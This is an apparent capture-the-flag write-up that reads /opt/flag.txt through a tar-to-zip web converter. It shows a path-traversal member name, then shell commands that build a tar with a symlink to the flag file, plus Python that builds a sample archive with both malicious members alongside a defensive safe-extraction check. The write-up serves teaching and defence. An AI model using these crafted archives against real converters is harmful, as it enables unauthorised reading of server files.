Task

I built a fancy shmancy web service that converts .tar archives to .zip!
Did the conversion once manually and then spent hours automating it, you know how it is. Now I just have to use it a few thousand times… But, ergh, you could help me with that.
Disclose the content of /opt/flag.txt!

There was a web site which lets you upload tar archives to convert them into zip archives you can download.

Solution

First I tried to modify the file name inside the tar archive to ../../../../opt/flag.txt and similar, but the server responded with a sassy message:

I’m starting to think you don’t really know what you’re doing… Hmmm.

So the next thing I tried was a malicious symlink:

sudo touch /opt/flag.txt
ln -s /opt/flag.txt evil_symlink
tar -cvf ebin.tar evil_symlink

Now it’s time to upload the tar archive and download the zip archive via the web browser.

unzip upload.zip
cat evil_symlink

After unzipping the archive, the file “evil_symlink” contained the following text:

MRMCD2023{5yml1nk5_3qu4l_d4n63rd4n63r}
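The converter fell for the symlink because it extracted whatever the archive contained and then zipped the extracted tree, following the link to /opt/flag.txt. The following is an added example (not code from the challenge or from this writeup) showing the check a converter should do before extracting: it uses only Python's standard tarfile module, builds a constructed archive in memory containing a harmless file, a traversal name like the one from the first attempt, and a symlink like the one that worked, and keeps only members that are regular files or directories whose resolved path stays under the destination. The destination directory name is a hypothetical placeholder.

```python
import io
import os
import tarfile
import tempfile


def member_is_safe(member: tarfile.TarInfo, dest: str) -> bool:
    """Accept only regular files and directories whose resolved path stays
    inside dest. Symlinks, hardlinks, devices and traversal names are all
    rejected, so the converter never follows a link to /opt/flag.txt."""
    if not (member.isreg() or member.isdir()):
        return False  # symlink, hardlink, fifo, char/block device
    if os.path.isabs(member.name):
        return False  # absolute names never belong in an upload
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_real, member.name))
    # "a/../../x" normalises to something outside dest_real and is rejected
    return target == dest_real or target.startswith(dest_real + os.sep)


def audit(tar_bytes: bytes, dest: str) -> dict:
    """Map every member name in the archive to whether it passes the check."""
    results = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            results[member.name] = member_is_safe(member, dest)
    return results


def safe_extract(tar_bytes: bytes, dest: str) -> list:
    """Extract only the members that pass member_is_safe; return their names."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        allowed = [m for m in tar.getmembers() if member_is_safe(m, dest)]
        tar.extractall(path=dest, members=allowed)
    return [m.name for m in allowed]


def build_sample_tar() -> bytes:
    """Constructed archive mirroring the two attempts described above."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        # 1. an honest regular file that a user would legitimately convert
        data = b"hello\n"
        info = tarfile.TarInfo("notes.txt")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))

        # 2. the path-traversal name from the first attempt (zero-size file)
        info = tarfile.TarInfo("../../../../opt/flag.txt")
        info.size = 0
        tar.addfile(info)

        # 3. the symlink from the second attempt, pointing at the flag file
        info = tarfile.TarInfo("evil_symlink")
        info.type = tarfile.SYMTYPE
        info.linkname = "/opt/flag.txt"
        tar.addfile(info)
    return buf.getvalue()


if __name__ == "__main__":
    dest = tempfile.mkdtemp(prefix="convert-")  # hypothetical work directory
    for name, ok in audit(build_sample_tar(), dest).items():
        print(f"{'keep  ' if ok else 'reject'} {name}")
    print("extracted:", safe_extract(build_sample_tar(), dest))
```

Only notes.txt survives the audit; the traversal name resolves outside the work directory and the symlink is rejected by type before its link target is even looked at. On Python 3.12 and later, tarfile.extractall(filter="data") performs an equivalent rejection of links that escape the destination, but an explicit per-member check like the one above also lets the service report which member was refused.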

Solved by petrosyan